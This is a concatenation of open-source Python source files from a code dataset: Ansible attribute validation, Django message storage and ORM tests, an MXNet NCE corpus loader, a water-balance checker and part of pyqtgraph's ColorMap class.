elif attribute.isa == 'bool':
value = boolean(value)
elif attribute.isa == 'percent':
# special value, which may be an integer or float
# with an optional '%' at the end
if isinstance(value, string_types) and '%' in value:
value = value.replace('%', '')
value = float(value)
elif attribute.isa == 'list':
if value is None:
value = []
elif not isinstance(value, list):
value = [ value ]
if attribute.listof is not None:
for item in value:
if not isinstance(item, attribute.listof):
raise AnsibleParserError("the field '%s' should be a list of %s, but the item '%s' is a %s" % (name, attribute.listof, item, type(item)), obj=self.get_ds())
elif attribute.required and attribute.listof == string_types:
if item is None or item.strip() == "":
raise AnsibleParserError("the field '%s' is required, and cannot have empty values" % (name,), obj=self.get_ds())
elif attribute.isa == 'set':
if value is None:
value = set()
else:
if not isinstance(value, (list, set)):
value = [ value ]
if not isinstance(value, set):
value = set(value)
elif attribute.isa == 'dict':
if value is None:
value = dict()
elif not isinstance(value, dict):
raise TypeError("%s is not a dictionary" % value)
# and assign the massaged value back to the attribute field
setattr(self, name, value)
except (TypeError, ValueError) as e:
raise AnsibleParserError("the field '%s' has an invalid value (%s), and could not be converted to an %s. Error was: %s" % (name, value, attribute.isa, e), obj=self.get_ds())
except UndefinedError as e:
if templar._fail_on_undefined_errors and name != 'name':
raise AnsibleParserError("the field '%s' has an invalid value, which appears to include a variable that is undefined. The error was: %s" % (name,e), obj=self.get_ds())
def serialize(self):
'''
Serializes the object derived from the base object into
a dictionary of values. This only serializes the field
attributes for the object, so this may need to be overridden
for any classes which wish to add additional items not stored
as field attributes.
'''
repr = dict()
for name in self._get_base_attributes():
repr[name] = getattr(self, name)
# serialize the uuid field
repr['uuid'] = getattr(self, '_uuid')
return repr
def deserialize(self, data):
'''
Given a dictionary of values, load up the field attributes for
this object. As with serialize(), if there are any non-field
attribute data members, this method will need to be overridden
and extended.
'''
assert isinstance(data, dict)
for (name, attribute) in iteritems(self._get_base_attributes()):
if name in data:
setattr(self, name, data[name])
else:
setattr(self, name, attribute.default)
# restore the UUID field
setattr(self, '_uuid', data.get('uuid'))
def _load_vars(self, attr, ds):
'''
Vars in a play can be specified either as a dictionary directly, or
as a list of dictionaries. If the later, this method will turn the
list into a single dictionary.
'''
def _validate_variable_keys(ds):
for key in ds:
if not isidentifier(key):
raise TypeError("%s is not a valid variable name" % key)
try:
if isinstance(ds, dict):
_validate_variable_keys(ds)
return ds
elif isinstance(ds, list):
all_vars = dict()
for item in ds:
if not isinstance(item, dict):
raise ValueError
_validate_variable_keys(item)
all_vars = combine_vars(all_vars, item)
return all_vars
elif ds is None:
return {}
else:
raise ValueError
except ValueError:
raise AnsibleParserError("Vars in a %s must be specified as a dictionary, or a list of dictionaries" % self.__class__.__name__, obj=ds)
except TypeError as e:
raise AnsibleParserError("Invalid variable name in vars specified for %s: %s" % (self.__class__.__name__, e), obj=ds)
def _extend_value(self, value, new_value):
'''
Will extend the value given with new_value (and will turn both
into lists if they are not so already). The values are run through
a set to remove duplicate values.
'''
if not isinstance(value, list):
value = [ value ]
if not isinstance(new_value, list):
new_value = [ new_value ]
#return list(set(value + new_value))
return [i for i,_ in itertools.groupby(value + new_value)]
def __getstate__(self):
return self.serialize()
def __setstate__(self, data):
self.__init__()
self.deserialize(data)
| gpl-3.0 |
sunils34/buffer-django-nonrel | django/contrib/messages/storage/__init__.py | 393 | 1183 | from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.importlib import import_module
def get_storage(import_path):
"""
Imports the message storage class described by import_path, where
import_path is the full Python path to the class.
"""
try:
dot = import_path.rindex('.')
except ValueError:
raise ImproperlyConfigured("%s isn't a Python path." % import_path)
module, classname = import_path[:dot], import_path[dot + 1:]
try:
mod = import_module(module)
except ImportError, e:
raise ImproperlyConfigured('Error importing module %s: "%s"' %
(module, e))
try:
return getattr(mod, classname)
except AttributeError:
raise ImproperlyConfigured('Module "%s" does not define a "%s" '
'class.' % (module, classname))
# Callable with the same interface as the storage classes i.e. accepts a
# 'request' object. It is wrapped in a lambda to stop 'settings' being used at
# the module level
default_storage = lambda request: get_storage(settings.MESSAGE_STORAGE)(request)
| bsd-3-clause |
vikingMei/mxnet | example/rnn/nce/src/nce/corpus.py | 1 | 2152 | #!/usr/bin/env python
# coding: utf-8
#
# Usage:
# Author: wxm71(weixing.mei@aispeech.com)
import math
import logging
import mxnet as mx
from .utils import tokenize, Vocab
from .corpusiter import NceCorpusIter
from ..loader import Corpus
class NceCorpus(Corpus):
def __init__(self, fbase, vocab:Vocab=None):
super(NceCorpus,self).__init__(fbase, vocab)
self.negdis = []
self.negative = []
self.build_negative()
def build_negative(self):
total_wrd = 0
# build negdis for train corpus
self.wrdfrq = [0.0]*len(self.vocab)
for idx in self.data_train:
self.wrdfrq[idx] += 1
total_wrd += 1
total_cnt = 0
self.negdis = [0]*len(self.vocab)
for idx,cnt in enumerate(self.wrdfrq):
self.wrdfrq[idx] /= total_wrd
if idx<Vocab.FIRST_VALID_ID or cnt<5:
self.negdis[idx] = 0.0
else:
v = int(math.pow(cnt, 0.75))
self.negdis[idx] = v
self.negative.extend([idx]*v)
total_cnt += v
denorm = float(total_cnt)
for key,_ in enumerate(self.negdis):
self.negdis[key] /= denorm
self.negdis = mx.nd.array(self.negdis)
def _get_iter(self, data, batch_size, bptt, numlab, num_parall=2):
return NceCorpusIter(data, batch_size, bptt, numlab, self.negative, num_parall)
def get_train_iter(self, batch_size, bptt, numlab, num_parall=2):
if not self._train_iter:
self._train_iter = self._get_iter(self.data_train, batch_size, bptt, numlab, num_parall)
return self._train_iter
def get_test_iter(self, batch_size, bptt, numlab, num_parall=2):
if not self._test_iter:
self._test_iter = self._get_iter(self.data_test, batch_size, bptt, numlab, num_parall)
return self._test_iter
def get_valid_iter(self, batch_size, bptt, numlab, num_parall=2):
if not self._valid_iter:
self._valid_iter = self._get_iter(self.data_valid, batch_size, bptt, numlab, num_parall)
return self._valid_iter
| apache-2.0 |
AlexHill/django | tests/many_to_many/tests.py | 21 | 17894 | from __future__ import unicode_literals
from django.test import TestCase
from django.utils import six
from .models import Article, Publication
class ManyToManyTests(TestCase):
def setUp(self):
# Create a couple of Publications.
self.p1 = Publication.objects.create(id=None, title='The Python Journal')
self.p2 = Publication.objects.create(id=None, title='Science News')
self.p3 = Publication.objects.create(id=None, title='Science Weekly')
self.p4 = Publication.objects.create(title='Highlights for Children')
self.a1 = Article.objects.create(id=None, headline='Django lets you build Web apps easily')
self.a1.publications.add(self.p1)
self.a2 = Article.objects.create(id=None, headline='NASA uses Python')
self.a2.publications.add(self.p1, self.p2, self.p3, self.p4)
self.a3 = Article.objects.create(headline='NASA finds intelligent life on Earth')
self.a3.publications.add(self.p2)
self.a4 = Article.objects.create(headline='Oxygen-free diet works wonders')
self.a4.publications.add(self.p2)
def test_add(self):
# Create an Article.
a5 = Article(id=None, headline='Django lets you reate Web apps easily')
# You can't associate it with a Publication until it's been saved.
self.assertRaises(ValueError, getattr, a5, 'publications')
# Save it!
a5.save()
# Associate the Article with a Publication.
a5.publications.add(self.p1)
self.assertQuerysetEqual(a5.publications.all(),
['<Publication: The Python Journal>'])
# Create another Article, and set it to appear in both Publications.
a6 = Article(id=None, headline='ESA uses Python')
a6.save()
a6.publications.add(self.p1, self.p2)
a6.publications.add(self.p3)
# Adding a second time is OK
a6.publications.add(self.p3)
self.assertQuerysetEqual(a6.publications.all(),
[
'<Publication: Science News>',
'<Publication: Science Weekly>',
'<Publication: The Python Journal>',
])
# Adding an object of the wrong type raises TypeError
with six.assertRaisesRegex(self, TypeError, "'Publication' instance expected, got <Article.*"):
a6.publications.add(a5)
# Add a Publication directly via publications.add by using keyword arguments.
a6.publications.create(title='Highlights for Adults')
self.assertQuerysetEqual(a6.publications.all(),
[
'<Publication: Highlights for Adults>',
'<Publication: Science News>',
'<Publication: Science Weekly>',
'<Publication: The Python Journal>',
])
def test_reverse_add(self):
# Adding via the 'other' end of an m2m
a5 = Article(headline='NASA finds intelligent life on Mars')
a5.save()
self.p2.article_set.add(a5)
self.assertQuerysetEqual(self.p2.article_set.all(),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA finds intelligent life on Mars>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(a5.publications.all(),
['<Publication: Science News>'])
# Adding via the other end using keywords
self.p2.article_set.create(headline='Carbon-free diet works wonders')
self.assertQuerysetEqual(
self.p2.article_set.all(),
[
'<Article: Carbon-free diet works wonders>',
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA finds intelligent life on Mars>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
a6 = self.p2.article_set.all()[3]
self.assertQuerysetEqual(a6.publications.all(),
[
'<Publication: Highlights for Children>',
'<Publication: Science News>',
'<Publication: Science Weekly>',
'<Publication: The Python Journal>',
])
def test_related_sets(self):
# Article objects have access to their related Publication objects.
self.assertQuerysetEqual(self.a1.publications.all(),
['<Publication: The Python Journal>'])
self.assertQuerysetEqual(self.a2.publications.all(),
[
'<Publication: Highlights for Children>',
'<Publication: Science News>',
'<Publication: Science Weekly>',
'<Publication: The Python Journal>',
])
# Publication objects have access to their related Article objects.
self.assertQuerysetEqual(self.p2.article_set.all(),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(self.p1.article_set.all(),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA uses Python>',
])
self.assertQuerysetEqual(Publication.objects.get(id=self.p4.id).article_set.all(),
['<Article: NASA uses Python>'])
def test_selects(self):
# We can perform kwarg queries across m2m relationships
self.assertQuerysetEqual(
Article.objects.filter(publications__id__exact=self.p1.id),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA uses Python>',
])
self.assertQuerysetEqual(
Article.objects.filter(publications__pk=self.p1.id),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA uses Python>',
])
self.assertQuerysetEqual(
Article.objects.filter(publications=self.p1.id),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA uses Python>',
])
self.assertQuerysetEqual(
Article.objects.filter(publications=self.p1),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA uses Python>',
])
self.assertQuerysetEqual(
Article.objects.filter(publications__title__startswith="Science"),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA uses Python>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(
Article.objects.filter(publications__title__startswith="Science").distinct(),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
# The count() function respects distinct() as well.
self.assertEqual(Article.objects.filter(publications__title__startswith="Science").count(), 4)
self.assertEqual(Article.objects.filter(publications__title__startswith="Science").distinct().count(), 3)
self.assertQuerysetEqual(
Article.objects.filter(publications__in=[self.p1.id, self.p2.id]).distinct(),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(
Article.objects.filter(publications__in=[self.p1.id, self.p2]).distinct(),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(
Article.objects.filter(publications__in=[self.p1, self.p2]).distinct(),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
# Excluding a related item works as you would expect, too (although the SQL
# involved is a little complex).
self.assertQuerysetEqual(Article.objects.exclude(publications=self.p2),
['<Article: Django lets you build Web apps easily>'])
def test_reverse_selects(self):
# Reverse m2m queries are supported (i.e., starting at the table that
# doesn't have a ManyToManyField).
self.assertQuerysetEqual(Publication.objects.filter(id__exact=self.p1.id),
['<Publication: The Python Journal>'])
self.assertQuerysetEqual(Publication.objects.filter(pk=self.p1.id),
['<Publication: The Python Journal>'])
self.assertQuerysetEqual(
Publication.objects.filter(article__headline__startswith="NASA"),
[
'<Publication: Highlights for Children>',
'<Publication: Science News>',
'<Publication: Science News>',
'<Publication: Science Weekly>',
'<Publication: The Python Journal>',
])
self.assertQuerysetEqual(Publication.objects.filter(article__id__exact=self.a1.id),
['<Publication: The Python Journal>'])
self.assertQuerysetEqual(Publication.objects.filter(article__pk=self.a1.id),
['<Publication: The Python Journal>'])
self.assertQuerysetEqual(Publication.objects.filter(article=self.a1.id),
['<Publication: The Python Journal>'])
self.assertQuerysetEqual(Publication.objects.filter(article=self.a1),
['<Publication: The Python Journal>'])
self.assertQuerysetEqual(
Publication.objects.filter(article__in=[self.a1.id, self.a2.id]).distinct(),
[
'<Publication: Highlights for Children>',
'<Publication: Science News>',
'<Publication: Science Weekly>',
'<Publication: The Python Journal>',
])
self.assertQuerysetEqual(
Publication.objects.filter(article__in=[self.a1.id, self.a2]).distinct(),
[
'<Publication: Highlights for Children>',
'<Publication: Science News>',
'<Publication: Science Weekly>',
'<Publication: The Python Journal>',
])
self.assertQuerysetEqual(
Publication.objects.filter(article__in=[self.a1, self.a2]).distinct(),
[
'<Publication: Highlights for Children>',
'<Publication: Science News>',
'<Publication: Science Weekly>',
'<Publication: The Python Journal>',
])
def test_delete(self):
# If we delete a Publication, its Articles won't be able to access it.
self.p1.delete()
self.assertQuerysetEqual(Publication.objects.all(),
[
'<Publication: Highlights for Children>',
'<Publication: Science News>',
'<Publication: Science Weekly>',
])
self.assertQuerysetEqual(self.a1.publications.all(), [])
# If we delete an Article, its Publications won't be able to access it.
self.a2.delete()
self.assertQuerysetEqual(Article.objects.all(),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA finds intelligent life on Earth>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(self.p2.article_set.all(),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: Oxygen-free diet works wonders>',
])
def test_bulk_delete(self):
# Bulk delete some Publications - references to deleted publications should go
Publication.objects.filter(title__startswith='Science').delete()
self.assertQuerysetEqual(Publication.objects.all(),
[
'<Publication: Highlights for Children>',
'<Publication: The Python Journal>',
])
self.assertQuerysetEqual(Article.objects.all(),
[
'<Article: Django lets you build Web apps easily>',
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(self.a2.publications.all(),
[
'<Publication: Highlights for Children>',
'<Publication: The Python Journal>',
])
# Bulk delete some articles - references to deleted objects should go
q = Article.objects.filter(headline__startswith='Django')
self.assertQuerysetEqual(q, ['<Article: Django lets you build Web apps easily>'])
q.delete()
# After the delete, the QuerySet cache needs to be cleared,
# and the referenced objects should be gone
self.assertQuerysetEqual(q, [])
self.assertQuerysetEqual(self.p1.article_set.all(),
['<Article: NASA uses Python>'])
def test_remove(self):
# Removing publication from an article:
self.assertQuerysetEqual(self.p2.article_set.all(),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA uses Python>',
'<Article: Oxygen-free diet works wonders>',
])
self.a4.publications.remove(self.p2)
self.assertQuerysetEqual(self.p2.article_set.all(),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: NASA uses Python>',
])
self.assertQuerysetEqual(self.a4.publications.all(), [])
# And from the other end
self.p2.article_set.remove(self.a3)
self.assertQuerysetEqual(self.p2.article_set.all(),
[
'<Article: NASA uses Python>',
])
self.assertQuerysetEqual(self.a3.publications.all(), [])
def test_assign(self):
# Relation sets can be assigned. Assignment clears any existing set members
self.p2.article_set = [self.a4, self.a3]
self.assertQuerysetEqual(self.p2.article_set.all(),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(self.a4.publications.all(),
['<Publication: Science News>'])
self.a4.publications = [self.p3.id]
self.assertQuerysetEqual(self.p2.article_set.all(),
['<Article: NASA finds intelligent life on Earth>'])
self.assertQuerysetEqual(self.a4.publications.all(),
['<Publication: Science Weekly>'])
# An alternate to calling clear() is to assign the empty set
self.p2.article_set = []
self.assertQuerysetEqual(self.p2.article_set.all(), [])
self.a4.publications = []
self.assertQuerysetEqual(self.a4.publications.all(), [])
def test_assign_ids(self):
# Relation sets can also be set using primary key values
self.p2.article_set = [self.a4.id, self.a3.id]
self.assertQuerysetEqual(self.p2.article_set.all(),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(self.a4.publications.all(),
['<Publication: Science News>'])
self.a4.publications = [self.p3.id]
self.assertQuerysetEqual(self.p2.article_set.all(),
['<Article: NASA finds intelligent life on Earth>'])
self.assertQuerysetEqual(self.a4.publications.all(),
['<Publication: Science Weekly>'])
def test_clear(self):
# Relation sets can be cleared:
self.p2.article_set.clear()
self.assertQuerysetEqual(self.p2.article_set.all(), [])
self.assertQuerysetEqual(self.a4.publications.all(), [])
# And you can clear from the other end
self.p2.article_set.add(self.a3, self.a4)
self.assertQuerysetEqual(self.p2.article_set.all(),
[
'<Article: NASA finds intelligent life on Earth>',
'<Article: Oxygen-free diet works wonders>',
])
self.assertQuerysetEqual(self.a4.publications.all(),
[
'<Publication: Science News>',
])
self.a4.publications.clear()
self.assertQuerysetEqual(self.a4.publications.all(), [])
self.assertQuerysetEqual(self.p2.article_set.all(),
['<Article: NASA finds intelligent life on Earth>'])
| bsd-3-clause |
lizardsystem/lizard-waterbalance | lizard_wbcomputation/target_value_checker.py | 1 | 2291 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=C0111
# The lizard_wbcomputation package implements the computational core of the
# lizard waterbalance Django app.
#
# Copyright (C) 2012 Nelen & Schuurmans
#
# This package is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this package. If not, see <http://www.gnu.org/licenses/>.
class TargetValueChecker(object):
"""Implements check whether a time series revolves around a target value.
This class retrieves the time series from a file through the use of a
reader object. The client code passes that reader to the constructor, which
stores it as attribute 'time_series_reader'. The reader should have a
method
def get(self, file_name)
that returns the time series.
The constructor sets the target value as attribute 'target_value'. By
default, the target value is 1.0 but client code can override this value
after construction.
"""
def __init__(self, time_series_reader):
self.time_series_reader = time_series_reader
self.target_value = 1.0
def verify(self, file_name):
"""Returns True if and only if the summed fractions from the given file
add up to one.
"""
success = True
timeseries = self.time_series_reader.get(file_name)
for date, value in timeseries.get_events():
event_value = value[0]
success = self.nearby_target_value(event_value)
if not success:
print 'Failure', date, event_value
break
return success
def nearby_target_value(self, value):
lower_bound = self.target_value - 1e-6
upper_bound = self.target_value + 1e-6
return value > lower_bound and value < upper_bound
| gpl-3.0 |
sarthakmeh03/django | tests/or_lookups/tests.py | 21 | 8040 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
from datetime import datetime
from operator import attrgetter
from django.db.models import Q
from django.test import TestCase
from django.utils.encoding import force_str
from .models import Article
class OrLookupsTests(TestCase):
def setUp(self):
self.a1 = Article.objects.create(
headline='Hello', pub_date=datetime(2005, 11, 27)
).pk
self.a2 = Article.objects.create(
headline='Goodbye', pub_date=datetime(2005, 11, 28)
).pk
self.a3 = Article.objects.create(
headline='Hello and goodbye', pub_date=datetime(2005, 11, 29)
).pk
def test_filter_or(self):
self.assertQuerysetEqual(
(
Article.objects.filter(headline__startswith='Hello') |
Article.objects.filter(headline__startswith='Goodbye')
), [
'Hello',
'Goodbye',
'Hello and goodbye'
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.filter(headline__contains='Hello') | Article.objects.filter(headline__contains='bye'), [
'Hello',
'Goodbye',
'Hello and goodbye'
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.filter(headline__iexact='Hello') | Article.objects.filter(headline__contains='ood'), [
'Hello',
'Goodbye',
'Hello and goodbye'
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.filter(Q(headline__startswith='Hello') | Q(headline__startswith='Goodbye')), [
'Hello',
'Goodbye',
'Hello and goodbye'
],
attrgetter("headline")
)
def test_stages(self):
# You can shorten this syntax with code like the following, which is
# especially useful if building the query in stages:
articles = Article.objects.all()
self.assertQuerysetEqual(
articles.filter(headline__startswith='Hello') & articles.filter(headline__startswith='Goodbye'),
[]
)
self.assertQuerysetEqual(
articles.filter(headline__startswith='Hello') & articles.filter(headline__contains='bye'), [
'Hello and goodbye'
],
attrgetter("headline")
)
def test_pk_q(self):
self.assertQuerysetEqual(
Article.objects.filter(Q(pk=self.a1) | Q(pk=self.a2)), [
'Hello',
'Goodbye'
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.filter(Q(pk=self.a1) | Q(pk=self.a2) | Q(pk=self.a3)), [
'Hello',
'Goodbye',
'Hello and goodbye'
],
attrgetter("headline"),
)
def test_pk_in(self):
self.assertQuerysetEqual(
Article.objects.filter(pk__in=[self.a1, self.a2, self.a3]), [
'Hello',
'Goodbye',
'Hello and goodbye'
],
attrgetter("headline"),
)
self.assertQuerysetEqual(
Article.objects.filter(pk__in=(self.a1, self.a2, self.a3)), [
'Hello',
'Goodbye',
'Hello and goodbye'
],
attrgetter("headline"),
)
self.assertQuerysetEqual(
Article.objects.filter(pk__in=[self.a1, self.a2, self.a3, 40000]), [
'Hello',
'Goodbye',
'Hello and goodbye'
],
attrgetter("headline"),
)
def test_q_repr(self):
or_expr = Q(baz=Article(headline="Foö"))
self.assertEqual(repr(or_expr), force_str("<Q: (AND: ('baz', <Article: Foö>))>"))
negated_or = ~Q(baz=Article(headline="Foö"))
self.assertEqual(repr(negated_or), force_str("<Q: (NOT (AND: ('baz', <Article: Foö>)))>"))
def test_q_negated(self):
# Q objects can be negated
self.assertQuerysetEqual(
Article.objects.filter(Q(pk=self.a1) | ~Q(pk=self.a2)), [
'Hello',
'Hello and goodbye'
],
attrgetter("headline")
)
self.assertQuerysetEqual(
Article.objects.filter(~Q(pk=self.a1) & ~Q(pk=self.a2)), [
'Hello and goodbye'
],
attrgetter("headline"),
)
# This allows for more complex queries than filter() and exclude()
# alone would allow
self.assertQuerysetEqual(
Article.objects.filter(Q(pk=self.a1) & (~Q(pk=self.a2) | Q(pk=self.a3))), [
'Hello'
],
attrgetter("headline"),
)
def test_complex_filter(self):
# The 'complex_filter' method supports framework features such as
# 'limit_choices_to' which normally take a single dictionary of lookup
# arguments but need to support arbitrary queries via Q objects too.
self.assertQuerysetEqual(
Article.objects.complex_filter({'pk': self.a1}), [
'Hello'
],
attrgetter("headline"),
)
self.assertQuerysetEqual(
Article.objects.complex_filter(Q(pk=self.a1) | Q(pk=self.a2)), [
'Hello',
'Goodbye'
],
attrgetter("headline"),
)
def test_empty_in(self):
# Passing "in" an empty list returns no results ...
self.assertQuerysetEqual(
Article.objects.filter(pk__in=[]),
[]
)
# ... but can return results if we OR it with another query.
self.assertQuerysetEqual(
Article.objects.filter(Q(pk__in=[]) | Q(headline__icontains='goodbye')), [
'Goodbye',
'Hello and goodbye'
],
attrgetter("headline"),
)
def test_q_and(self):
# Q arg objects are ANDed
self.assertQuerysetEqual(
Article.objects.filter(Q(headline__startswith='Hello'), Q(headline__contains='bye')), [
'Hello and goodbye'
],
attrgetter("headline")
)
# Q arg AND order is irrelevant
self.assertQuerysetEqual(
Article.objects.filter(Q(headline__contains='bye'), headline__startswith='Hello'), [
'Hello and goodbye'
],
attrgetter("headline"),
)
self.assertQuerysetEqual(
Article.objects.filter(Q(headline__startswith='Hello') & Q(headline__startswith='Goodbye')),
[]
)
def test_q_exclude(self):
self.assertQuerysetEqual(
Article.objects.exclude(Q(headline__startswith='Hello')), [
'Goodbye'
],
attrgetter("headline")
)
def test_other_arg_queries(self):
# Try some arg queries with operations other than filter.
self.assertEqual(
Article.objects.get(Q(headline__startswith='Hello'), Q(headline__contains='bye')).headline,
'Hello and goodbye'
)
self.assertEqual(
Article.objects.filter(Q(headline__startswith='Hello') | Q(headline__contains='bye')).count(),
3
)
self.assertSequenceEqual(
Article.objects.filter(Q(headline__startswith='Hello'), Q(headline__contains='bye')).values(), [
{"headline": "Hello and goodbye", "id": self.a3, "pub_date": datetime(2005, 11, 29)},
],
)
self.assertEqual(
Article.objects.filter(Q(headline__startswith='Hello')).in_bulk([self.a1, self.a2]),
{self.a1: Article.objects.get(pk=self.a1)}
)
| bsd-3-clause |
acq4/acq4 | acq4/pyqtgraph/colormap.py | 3 | 9846 | import numpy as np
from .Qt import QtGui, QtCore
from .python2_3 import basestring
class ColorMap(object):
"""
A ColorMap defines a relationship between a scalar value and a range of colors.
ColorMaps are commonly used for false-coloring monochromatic images, coloring
scatter-plot points, and coloring surface plots by height.
Each color map is defined by a set of colors, each corresponding to a
particular scalar value. For example:
| 0.0 -> black
| 0.2 -> red
| 0.6 -> yellow
| 1.0 -> white
The colors for intermediate values are determined by interpolating between
the two nearest colors in either RGB or HSV color space.
To provide user-defined color mappings, see :class:`GradientWidget <pyqtgraph.GradientWidget>`.
"""
## color interpolation modes
RGB = 1
HSV_POS = 2
HSV_NEG = 3
## boundary modes
CLIP = 1
REPEAT = 2
MIRROR = 3
## return types
BYTE = 1
FLOAT = 2
QCOLOR = 3
enumMap = {
'rgb': RGB,
'hsv+': HSV_POS,
'hsv-': HSV_NEG,
'clip': CLIP,
'repeat': REPEAT,
'mirror': MIRROR,
'byte': BYTE,
'float': FLOAT,
'qcolor': QCOLOR,
}
def __init__(self, pos, color, mode=None):
"""
=============== ==============================================================
**Arguments:**
pos Array of positions where each color is defined
color Array of RGBA colors.
Integer data types are interpreted as 0-255; float data types
are interpreted as 0.0-1.0
mode Array of color modes (ColorMap.RGB, HSV_POS, or HSV_NEG)
indicating the color space that should be used when
interpolating between stops. Note that the last mode value is
ignored. By default, the mode is entirely RGB.
=============== ==============================================================
"""
self.pos = np.array(pos)
order = np.argsort(self.pos)
self.pos = self.pos[order]
self.color = np.array(color)[order]
if mode is None:
mode = np.ones(len(pos))
self.mode = mode
self.stopsCache = {}
def map(self, data, mode='byte'):
"""
Return an array of colors corresponding to the values in *data*.
Data must be either a scalar position or an array (any shape) of positions.
The *mode* argument determines the type of data returned:
=========== ===============================================================
byte (default) Values are returned as 0-255 unsigned bytes.
float Values are returned as 0.0-1.0 floats.
qcolor Values are returned as an array of QColor objects.
=========== ===============================================================
"""
if isinstance(mode, basestring):
mode = self.enumMap[mode.lower()]
if mode == self.QCOLOR:
pos, color = self.getStops(self.BYTE)
else:
pos, color = self.getStops(mode)
# don't need this--np.interp takes care of it.
#data = np.clip(data, pos.min(), pos.max())
# Interpolate
# TODO: is griddata faster?
# interp = scipy.interpolate.griddata(pos, color, data)
if np.isscalar(data):
interp = np.empty((color.shape[1],), dtype=color.dtype)
else:
if not isinstance(data, np.ndarray):
data = np.array(data)
interp = np.empty(data.shape + (color.shape[1],), dtype=color.dtype)
for i in range(color.shape[1]):
interp[...,i] = np.interp(data, pos, color[:,i])
# Convert to QColor if requested
if mode == self.QCOLOR:
if np.isscalar(data):
return QtGui.QColor(*interp)
else:
return [QtGui.QColor(*x) for x in interp]
else:
return interp
def mapToQColor(self, data):
"""Convenience function; see :func:`map() <pyqtgraph.ColorMap.map>`."""
return self.map(data, mode=self.QCOLOR)
def mapToByte(self, data):
"""Convenience function; see :func:`map() <pyqtgraph.ColorMap.map>`."""
return self.map(data, mode=self.BYTE)
def mapToFloat(self, data):
"""Convenience function; see :func:`map() <pyqtgraph.ColorMap.map>`."""
return self.map(data, mode=self.FLOAT)
def getGradient(self, p1=None, p2=None):
"""Return a QLinearGradient object spanning from QPoints p1 to p2."""
if p1 == None:
p1 = QtCore.QPointF(0,0)
if p2 == None:
p2 = QtCore.QPointF(self.pos.max()-self.pos.min(),0)
g = QtGui.QLinearGradient(p1, p2)
pos, color = self.getStops(mode=self.BYTE)
color = [QtGui.QColor(*x) for x in color]
g.setStops(list(zip(pos, color)))
#if self.colorMode == 'rgb':
#ticks = self.listTicks()
#g.setStops([(x, QtGui.QColor(t.color)) for t,x in ticks])
#elif self.colorMode == 'hsv': ## HSV mode is approximated for display by interpolating 10 points between each stop
#ticks = self.listTicks()
#stops = []
#stops.append((ticks[0][1], ticks[0][0].color))
#for i in range(1,len(ticks)):
#x1 = ticks[i-1][1]
#x2 = ticks[i][1]
#dx = (x2-x1) / 10.
#for j in range(1,10):
#x = x1 + dx*j
#stops.append((x, self.getColor(x)))
#stops.append((x2, self.getColor(x2)))
#g.setStops(stops)
return g
def getColors(self, mode=None):
"""Return list of all color stops converted to the specified mode.
If mode is None, then no conversion is done."""
if isinstance(mode, basestring):
mode = self.enumMap[mode.lower()]
color = self.color
if mode in [self.BYTE, self.QCOLOR] and color.dtype.kind == 'f':
color = (color * 255).astype(np.ubyte)
elif mode == self.FLOAT and color.dtype.kind != 'f':
color = color.astype(float) / 255.
if mode == self.QCOLOR:
color = [QtGui.QColor(*x) for x in color]
return color
def getStops(self, mode):
## Get fully-expanded set of RGBA stops in either float or byte mode.
if mode not in self.stopsCache:
color = self.color
if mode == self.BYTE and color.dtype.kind == 'f':
color = (color * 255).astype(np.ubyte)
elif mode == self.FLOAT and color.dtype.kind != 'f':
color = color.astype(float) / 255.
## to support HSV mode, we need to do a little more work..
#stops = []
#for i in range(len(self.pos)):
#pos = self.pos[i]
#color = color[i]
#imode = self.mode[i]
#if imode == self.RGB:
#stops.append((x,color))
#else:
#ns =
